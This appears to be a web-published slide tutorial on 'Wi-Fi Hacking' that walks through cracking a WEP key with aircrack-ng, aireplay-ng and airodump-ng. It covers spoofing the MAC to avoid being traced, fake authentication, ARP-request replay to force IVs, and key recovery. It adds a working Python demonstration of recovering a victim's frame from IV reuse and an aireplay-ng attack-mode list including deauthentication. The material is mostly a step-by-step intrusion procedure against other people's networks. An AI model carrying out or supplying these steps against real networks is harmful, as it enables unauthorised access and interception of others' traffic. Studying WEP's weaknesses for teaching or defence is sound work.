Published on June 26, 2020
1. SKYNET SECURE SOLUTIONS NOTES FOR Wi-Fi Hacking By Kashif Memon
2. WHAT is Wi-Fi? "Wi-Fi" is a trademark of the Wi-Fi Alliance, not an acronym; "Wireless Fidelity" is a widely repeated backronym. Uses the 2.4 GHz and 5 GHz bands of the radio spectrum. Allows data to be exchanged WIRELESSLY over radio waves. Defined as "WLAN products that are based on the IEEE 802.11 standards". In 2004, Mysore became India's first Wi-Fi-enabled city and second in the world after Jerusalem.
3. Advantages: Cheaper. Less complexity (no cabling to run). Fast connectivity. Secure when WPA2 (or the newer WPA3) is used; this does not apply to WEP.
4. Disadvantages: Requires a Wi-Fi adapter (obviously). Slower data transfer when the signal is weak or the client is far from the access point. Obstructions may cause disconnections. A WEP passcode is easily CRACKABLE!
5. Wi-Fi is defined by the "802.11 standard". Flavors of 802.11: 802.11a operates in the 5 GHz band at up to 54 Mbps. 802.11b operates in the 2.4 GHz band at up to 11 Mbps. 802.11g operates in the 2.4 GHz band at up to 54 Mbps. 802.11n (2009) operates in both bands and uses MIMO for up to 600 Mbps; it has since been followed by 802.11ac and 802.11ax (Wi-Fi 6).
6. Do YoU KnOw !? Prerequisites: 1. A compatible wireless adapter, meaning one whose driver supports monitor mode and packet injection. 2. BackTrack 3 or later (USB boot or live CD); BackTrack has since been replaced by Kali Linux, which ships the same aircrack-ng suite. 3. A WEP-enabled Wi-Fi network. 4. Knowledge of channel, BSSID, ESSID and MAC address.
7. LeTs GeT cRaCkInG! 1. To crack the WEP key, first boot into BackTrack in text mode or default mode, then load the GUI with "startx". 2. One important thing is to know whether the adapter in your laptop is capable of packet injection. Run airmon-ng with no arguments to list the wireless interfaces with their chipset and driver; whether injection actually works is confirmed later with the aireplay-ng injection test (-9).
8. KeEp It CoMiNg … 3. First stop the interface we want to use: airmon-ng stop (intf). 4. Bring the interface down, which macchanger requires: ifconfig (intf) down (plain ifconfig shows its state). 5. To avoid being traced back, spoof the MAC address: macchanger --mac (hex) (intf).
9. FaStEr NoW … C’mOn 6. Now start the interface in monitor mode: airmon-ng start (intf). On BackTrack this creates a separate monitor interface (mon0); use that interface name in the commands that follow. 7. Now find the target network: airodump-ng (intf) lists nearby access points with their BSSID (Basic Service Set Identifier, the AP's MAC address), channel, encryption and ESSID. 8. Now capture only the target's traffic to a file; that capture is what the WEP key will be cracked from: airodump-ng -c (ch) -w (prefix) --bssid (bssid) (intf). Note that -w takes an output file prefix, not the interface name: with the prefix Wifi the capture is written to Wifi-01.cap, the file used in step 12.
10. YoUr NeArLy DoNe ! 9. [In a NEW CONSOLE] Here we artificially increase the traffic so the AP produces new IVs faster than the victim's own traffic would. First associate with the AP using fake authentication: aireplay-ng -1 0 -a (bssid) -h (mac) -e (essid) (intf). Then capture an ARP request and replay it over and over; the AP answers every copy with a freshly encrypted frame, i.e. a new IV: aireplay-ng -3 -b (bssid) -h (mac) (intf). The -h (mac) must be the MAC set in step 5, and the fake authentication has to succeed before the replay attack will produce anything. 10. Now wait patiently until the #Data column in airodump-ng goes above 10K. More is better: with aircrack-ng's PTW attack about 20,000 IVs are usually enough for a 40-bit key, and 40,000 or more for a 104-bit key, so treat 10K as a minimum rather than a target.
11. SuCcEsSfUl??! 11. Use ls to list the files in the directory where airodump-ng was started (its current working directory, not necessarily the desktop); that is where the capture files (Wifi-01.cap, Wifi-01.csv, ...) are written. 12. Now finally use aircrack-ng, which uses the collected IVs to recover the WEP key: aircrack-ng -b (bssid) Wifi-01.cap. If it reports that it needs more IVs, leave airodump-ng and aireplay-ng running and rerun it later; it can be run repeatedly against the growing capture file. Now, to understand the commands, here is the extra information -> Next Slide :D
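Why steps 7 to 12 collect IVs instead of guessing the key, shown in working Python. This is an added example written for this page, not code from the slides or from aircrack-ng. It implements RC4 and the WEP frame body (IV, key ID, RC4-encrypted data plus CRC-32 ICV) as laid out in IEEE 802.11-1999, then shows the two things a capture hands an attacker: keystream reuse when a 24-bit IV repeats (a victim's frame is recovered with no key at all, using a frame whose plaintext is known, such as the ARP request aireplay-ng injects), and the FMS "weak IV" shape that aircrack-ng's statistical key recovery votes over. The key, IVs and payloads are constructed for the demo, the 802.11 MAC header is omitted, and iv_stats is a simplified stand-in for what airodump-ng's #Data counter tracks, not its actual code.

```python
"""WEP's 24-bit IV: the weakness behind the capture-and-crack workflow.

Added example for this page; not code from the slides or from aircrack-ng.
RC4 and the WEP body layout follow IEEE 802.11-1999: IV || key ID ||
RC4(IV||key, data || CRC-32 ICV). Key, IVs and payloads are constructed for
the demo; the 24-byte 802.11 MAC header is omitted because the attacks only
need the encrypted body.
"""
import zlib
from collections import Counter

# LLC/SNAP header that prefixes IPv4 (0x0800) and ARP (0x0806) payloads on
# 802.11: 8 bytes of known plaintext at the start of most data frames.
SNAP_IPV4 = bytes.fromhex("aaaa030000000800")
SNAP_ARP = bytes.fromhex("aaaa030000000806")

def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream (KSA + PRGA). WEP seeds it with IV || root key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(root_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Build a WEP frame body: IV(3) | key ID(1) | RC4(IV||key, plaintext||ICV)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    data = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    keystream = rc4(iv + root_key, len(data))
    return iv + b"\x00" + bytes(c ^ k for c, k in zip(data, keystream))

def wep_decrypt(root_key: bytes, body: bytes) -> bytes:
    """Decrypt a WEP body with the real key and verify the CRC-32 ICV."""
    iv, enc = body[:3], body[4:]
    data = bytes(c ^ k for c, k in zip(enc, rc4(iv + root_key, len(enc))))
    plaintext, icv = data[:-4], data[-4:]
    if zlib.crc32(plaintext).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch: wrong key or corrupted frame")
    return plaintext

def recover_keystream(body: bytes, known_plaintext: bytes) -> tuple:
    """Known-plaintext step: keystream = ciphertext XOR plaintext, no key needed.
    SNAP gives 8 bytes of any IP frame; a frame you injected is known in full."""
    enc = body[4:4 + len(known_plaintext)]
    return body[:3], bytes(c ^ p for c, p in zip(enc, known_plaintext))

def decrypt_with_keystream(body: bytes, keystream: bytes) -> bytes:
    """Decrypt another frame that reused the same IV, as far as the keystream reaches."""
    enc = body[4:4 + len(keystream)]
    return bytes(c ^ k for c, k in zip(enc, keystream))

def weak_iv_key_byte(iv: bytes, key_len: int = 5):
    """FMS 'resolved' IV shape (A+3, 0xFF, X) leaks root-key byte A with roughly
    5% probability per such IV; aircrack-ng votes over many. Returns A or None."""
    a = iv[0] - 3
    return a if iv[1] == 0xFF and 0 <= a < key_len else None

def iv_stats(bodies: list, key_len: int = 5) -> dict:
    """Simplified stand-in for what airodump-ng's #Data column summarises:
    frames, distinct IVs, IVs seen more than once (keystream reuse), weak IVs."""
    ivs = Counter(b[:3] for b in bodies)
    return {
        "frames": sum(ivs.values()),
        "unique_ivs": len(ivs),
        "reused_ivs": sum(1 for n in ivs.values() if n > 1),
        "weak_ivs": sum(n for iv, n in ivs.items()
                        if weak_iv_key_byte(iv, key_len) is not None),
        "iv_space": 1 << 24,   # 16,777,216 IVs; a busy AP wraps around in hours
    }

if __name__ == "__main__":
    key = bytes.fromhex("0102030405")      # constructed 40-bit WEP key
    iv = b"\x11\x22\x33"                   # constructed IV, reused by two frames
    # Frame 1: an ARP request the attacker injected, so its plaintext is fully known.
    p1 = SNAP_ARP + b"constructed ARP request body"
    # Frame 2: a victim's IPv4 frame that happens to reuse the same IV.
    p2 = SNAP_IPV4 + b"victim secret"
    b1, b2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    _, ks = recover_keystream(b1, p1)
    print("recovered without the key:", decrypt_with_keystream(b2, ks)[:len(p2)])
    print(iv_stats([b1, b2, wep_encrypt(key, b"\x03\xff\x07", p2)]))
```

Running the file directly prints the victim's payload recovered purely from IV reuse, plus the IV statistics for three constructed frames. The 24-bit IV space is the whole story: once the attacker has forced enough frames through the AP, IVs repeat and weak IVs pile up, which is exactly why the slides have you inject ARP replays and wait for #Data to climb before running aircrack-ng.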
12. aireplay-ng usage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
Attack modes:
-0 : deauthenticate 1 or all stations
-1 : fake authentication with AP
-2 : interactive frame selection
-3 : standard ARP-request replay
-4 : decrypt/chopchop WEP packet
-5 : fragmentation attack, generates valid keystream
-9 : injection test